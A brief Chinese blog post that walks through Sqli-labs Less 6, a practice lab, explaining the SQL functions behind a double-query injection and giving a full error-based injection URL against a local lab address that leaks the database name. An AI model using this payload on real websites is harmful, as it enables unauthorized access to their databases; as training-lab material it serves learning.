Sqli-labs - GET注入 - LESS 6

GET - Double Injection - Double Quotes - String(双引号的双注入)

步骤和上面一题一致,只是变成双引号

这次不妨换一种注法

rand()生成介于0~1之间的随机数
floor()向下舍入为指定小数位数
count()函数返回指定的值的数目
concat()将多个字符串连接成一个字符串
group by根据要求对结果排序


http://192.168.147.133/Less-6/?id=0" union select count(*),2,concat(':',(select database()),':',floor(rand()*2))as a from information_schema.tables group by a%23

说实话这种普通注入,没有过滤的话用sqlmap最简单

posted @ 2020-05-05 15:38  ch0bits  阅读(157)  评论(0编辑  收藏  举报